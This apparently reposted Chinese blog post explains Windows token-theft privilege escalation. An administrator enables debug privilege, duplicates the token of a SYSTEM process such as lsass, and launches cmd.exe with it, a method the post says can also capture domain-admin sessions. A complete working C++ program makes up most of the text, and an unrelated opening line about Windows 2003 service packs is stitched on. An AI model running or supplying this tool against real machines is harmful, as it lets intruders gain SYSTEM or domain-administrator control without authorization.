前沿拓展:
windows 2003 sp
sp=ServicePack,服务包的意思,其实就是补丁的**,一次安装,之前的 那些系统补丁
SYSTEM->本机上其他用户(包括域用户)(好家伙,只要本机有system权限,域管敢在本机上创建进程就直接能拿到域管权限) 或者admin获取debug权限后去获取SYSTEM权限(这里有一个细节点,只有owner为administrator的SYSTEM进程才能被利用,比如lsass,dllhost)
技术细节:通过寻找高权限开启的进程,再**其令牌用以创建新进程,即可达到提权目的
#include <iostream>
#include <Windows.h>
//Only administrator can get debug priv
BOOL GetDebugPriv() {
HANDLE Token;
TOKEN_PRIVILEGES tp;
LUID Luid;
if (!OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &Token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
return false;
}
tp.PrivilegeCount = 1;
tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
if (!LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &Luid)) {
std::cout << "LookupPrivilegeValue ERROR" << GetLastError() << std::endl;
return false;
}
tp.Privileges[0].Luid = Luid;
if (!AdjustTokenPrivileges(Token, FALSE, &tp, sizeof(tp), NULL, NULL) ){
std::cout << "AdjustTokenPrivileges ERROR" << GetLastError() << std::endl;
return false;
}
if (GetLastError() == ERROR_NOT_ALL_ASSIGNED) {
return false;
}
else {
return true;
}
}
int main(int argc, char* argv[]) {
HANDLE t_process;
HANDLE token = NULL;
HANDLE token_bak = NULL;
DWORD process_id;
sscanf_s(argv[1], "%ul", &process_id);
WCHAR command[] = L"C:\Windows\System32\cmd.exe";
STARTUPINFO startupInfo;
PROCESS_INFORMATION processInformation;
ZeroMemory(&startupInfo, sizeof(STARTUPINFO));
ZeroMemory(&processInformation, sizeof(PROCESS_INFORMATION));
startupInfo.cb = sizeof(STARTUPINFO);
std::cout << argv[1] << std::endl;
std::cout << "Openning process PID:" << process_id << std::endl;
if (GetDebugPriv()== TRUE) {
std::cout << "Got the debug priv" << std::endl;
}
else {
std::cout << "GetDebugPriv ERROR" << std::endl;
}
system("whoami /priv");
t_process = OpenProcess(PROCESS_ALL_ACCESS, true, process_id);
if (!t_process) {
std::cout << "OpenProcess ERROR" << GetLastError() << std::endl;
}
if (!OpenProcessToken(t_process, TOKEN_ALL_ACCESS, &token)) {
std::cout << "OpenProcessToken ERROR" << GetLastError() << std::endl;
}
if (!DuplicateTokenEx(token, TOKEN_ALL_ACCESS, NULL, SecurityImpersonation, TokenPrimary, &token_bak)) {
std::cout << "DuplicateTokenEx ERROR" << GetLastError() << std::endl;
}
if (!CreateProcessWithTokenW(token_bak, LOGON_WITH_PROFILE, NULL, command, 0, NULL, NULL, &startupInfo, &processInformation)) {
std::cout << "CreateProcessWithTokenW ERROR" << GetLastError() << std::endl;
}
return 0;
}
这是在win7下的测试结果 constadministrator 是域控
拓展知识:
原创文章,作者:九贤生活小编,如若转载,请注明出处:http://www.wangguangwei.com/5422.html